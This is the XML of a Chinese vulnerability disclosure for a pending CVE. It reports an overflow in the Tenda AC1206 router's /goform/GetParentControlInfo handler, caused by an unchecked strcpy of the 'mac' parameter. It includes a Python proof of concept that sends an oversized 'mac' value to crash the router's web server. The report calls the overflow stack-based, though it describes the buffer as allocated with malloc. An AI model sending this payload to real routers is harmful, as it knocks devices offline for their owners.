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31032">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="u6d362e6a"/>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkStart w:id="1" w:name="N9SMX"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Tenda Wi-Fi 5 Router AC1206 中的基于堆栈的缓冲区溢出漏洞（AC1206V1.0RTL_V15.03.06.23）</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="1"/>
    <w:p w14:paraId="1997ECE8">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="Hn1CZ"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>概述</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="2"/>
    <w:p w14:paraId="58EF569B">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="u7f23a84a"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>在运行固件版本 AC1206V1.0RTL_V15.03.06.23 的 Tenda Wi-Fi 5 Router AC12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06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设备中存在一个基于堆栈的缓冲区溢出漏洞。由于 GetParentControlInfo 函数中对某些参数缺乏限制，且没有进行边界检查，可能会导致堆栈溢出。未经身份验证的远程攻击者可以通过该端点中的参数执行拒绝服务（DoS）攻击。</w:t>
      </w:r>
      <w:bookmarkStart w:id="46" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="46"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/goform/GetParentControlInfo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eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>、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initWebs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eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>、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formDefineTendDa</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="3"/>
    <w:p w14:paraId="3CFFD1D2">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="bLNo7"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>漏洞详情</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="4"/>
    <w:p w14:paraId="11FD62A3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5" w:name="uce905fcb"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>厂商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：深圳市吉祥腾达科技有限公司</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="5"/>
    <w:p w14:paraId="0B583656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6" w:name="ue8f67289"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>漏洞类型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：基于堆栈的缓冲区溢出（CWE-121）</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="6"/>
    <w:p w14:paraId="1A979D0E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7" w:name="u222e7787"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>受影响产品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：Tenda Wi-Fi 5 Router AC12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06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设备</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="7"/>
    <w:p w14:paraId="3A23E211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8" w:name="u705a4439"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>受影响版本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：AC1206V1.0RTL_V15.03.06.23</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="8"/>
    <w:p w14:paraId="3DCD4A34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9" w:name="u959c3f6c"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>攻击向量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：针对没有边界检查、缺乏参数限制的函数，利用精心构造的 payload 造成基于堆栈的缓冲区溢出</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="9"/>
    <w:p w14:paraId="0D7C8DA2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10" w:name="u6a211218"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>影响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10"/>
    <w:p w14:paraId="394B6925">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="ubd55a38c"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>拒绝服务（DoS）</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="11"/>
    <w:p w14:paraId="0BA8A302"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12" w:name="ub49bc749"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>受影响组件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：/goform/GetParentControlInfo、initWebs、formDefineTendDa</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="12"/>
    <w:p w14:paraId="0BE3BFB0"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13" w:name="u7e4210cf"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CVE 编号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：待处理（CVE 申请正在进行中）</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="13"/>
    <w:p w14:paraId="7EC208FC"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14" w:name="uf7c22c07"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>发现者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：xxricardoxkk（xxricardoxkk@gmail.com）</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="14"/>
    <w:p w14:paraId="66EA7605"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15" w:name="uee4a91f0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>固件链接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  <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.tenda.com.cn/material/show/2766" \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>https://www.tenda.com.cn/material/show/2766</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="15"/>
    <w:p w14:paraId="75DC2B38">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="c3e2G"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>发现过程</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="16"/>
    <w:p w14:paraId="5512353F">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="ucbc1544c"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>该漏洞是通过分析固件（US_AC1206V1.0RTL_V15.03.06.23_multi_TD01.bin）发现的。在 squashfs-root/bin/httpd 文件中存在如下调用链：main → initWebs → formDefineTendDa → GetParentControlInfo</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="17"/>
    <w:p w14:paraId="73D23F5A">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="uc65408e1"/>
      <w:bookmarkStart w:id="19" w:name="ueb986e05"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5842000" cy="226631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66666" cy="328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bookmarkEnd w:id="19"/>
    <w:p w14:paraId="51F7F78A">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="ud7c3f6eb"/>
      <w:bookmarkStart w:id="21" w:name="ub8be2b75"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5842000" cy="533019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7334" cy="641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bookmarkEnd w:id="21"/>
    <w:p w14:paraId="086551F0">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="uae2c22e8"/>
      <w:bookmarkStart w:id="23" w:name="ucc6fd8f7"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5842000" cy="37445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57066" cy="503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bookmarkEnd w:id="23"/>
    <w:p w14:paraId="32931545">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="u0239051e"/>
      <w:bookmarkStart w:id="25" w:name="u2f9ff96b"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5842000" cy="354584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46534" cy="500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bookmarkEnd w:id="25"/>
    <w:p w14:paraId="0E5999C2">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="u64b46597"/>
      <w:bookmarkStart w:id="27" w:name="u0dfc3165"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5841365" cy="383032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6934" cy="500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bookmarkEnd w:id="27"/>
    <w:p w14:paraId="145EF967">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="u184500ad"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>程序会检索用户输入参数“mac”，下图中的 strcpy 函数会从 mac_addr 复制内容到 pc_info-&gt;mac_addr，且不检查目标缓冲区大小。其中 pc_info = (parent_control_info *)malloc(0x254u)，0x254 对应的字节数为 596 字节。若 mac_addr 的长度超过 pc_info-&gt;mac_addr 缓冲区的大小，就会发生溢出。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="28"/>
    <w:p w14:paraId="7BA95B8F">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="u3da7ba21"/>
      <w:bookmarkStart w:id="30" w:name="u5c34b8f4"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5706110" cy="503745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534" cy="503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bookmarkEnd w:id="30"/>
    <w:p w14:paraId="5A9B8834">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="u61081077"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>因此，在接口路径 /goform/GetParentControlInfo 处精心设计 payload 即可造成缓冲区溢出。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="31"/>
    <w:p w14:paraId="28BCE2E6">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="lZFX0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>复现步骤</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="32"/>
    <w:p w14:paraId="6168635B">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="ueaf279a4"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>用 Python 构造如下 payload：</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="33"/>
    <w:p w14:paraId="6374D660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34" w:name="ofP80"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>import requests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 构造溢出载荷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def create_payload():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buffer_size = 51200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payload = b"A" * buffer_size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v11_value = b"\xef\xbe\xad\xde"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payload += v11_value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return payload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 构造 HTTP 请求并发送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def send_payload(url, payload):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params = {'mac': payload}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response = requests.get(url, params=params)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response = requests.get(url, params=params)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print("Response status code:", response.status_code)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print("Response body:", response.text)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if __name__ == "__main__":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# 目标 URL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url = "http://192.168.31.12/goform/GetParentControlInfo"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# 创建恶意载荷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payload = create_payload()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# 发送恶意请求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send_payload(url, payload)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="34"/>
    <w:p w14:paraId="5AF6D16C">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="ud56309fa"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>使用 qemu 对从 US_AC1206V1.0RTL_V15.03.06.23_multi_TD01.bin 中提取的 httpd 进行仿真（注意，该文件是 mips 小端序架构，需利用 ida 对 httpd 进行修改以适配仿真环境）。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="35"/>
    <w:p w14:paraId="492D86DC">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="uaad0c587"/>
      <w:bookmarkStart w:id="37" w:name="ucb3fe94c"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5841365" cy="338201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32800" cy="48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bookmarkEnd w:id="37"/>
    <w:p w14:paraId="3E9552C1">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="ue1ea5300"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>如下图所示，仿真成功。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="38"/>
    <w:p w14:paraId="50F6CE14">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="ua2be40a4"/>
      <w:bookmarkStart w:id="40" w:name="u36ccc714"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5842000" cy="29559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16267" cy="587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bookmarkEnd w:id="40"/>
    <w:p w14:paraId="544B0566">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="u10ebffed"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>利用此脚本触发栈溢出。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="41"/>
    <w:p w14:paraId="1D835A48">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="u95e3e580"/>
      <w:bookmarkStart w:id="43" w:name="u641bcecb"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5842000" cy="293814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51733" cy="591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</w:p>
    <w:bookmarkEnd w:id="43"/>
    <w:p w14:paraId="00D4FB08">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="q8pGR"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>影响</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="44"/>
    <w:p w14:paraId="6EEC7F5F">
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="uc6510972"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>未经身份验证的远程攻击者可以通过该端点中的参数执行拒绝服务（DoS）攻击。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="45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55107747"/>
    <w:rsid w:val="63CC6ABB"/>
    <w:rsid w:val="6C084F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qFormat/>
    <w:uiPriority w:val="99"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="18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651</Words>
  <Characters>1734</Characters>
  <TotalTime>5</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1910</CharactersWithSpaces>
  <Application>WPS Office_12.1.0.22483_F1E327BC-269C-435d-A152-05C5408002CA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2025-08-14T09:23:00Z</dcterms:created>
  <dc:creator>ricardo</dc:creator>
  <cp:lastModifiedBy>永燃的瞳术师</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-14T09:32:20Z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eyJoZGlkIjoiYjY4OTI1MWM0NmI4MDgyMDBkODAyNmFhMDZmZmUxMzAiLCJ1c2VySWQiOiIyNjI0NTczOTgifQ==</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>2052-12.1.0.22483</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>671BB60BA2BE4EADB5A77EE64A27E5C7_12</vt:lpwstr>
  </property>
</Properties>
</file>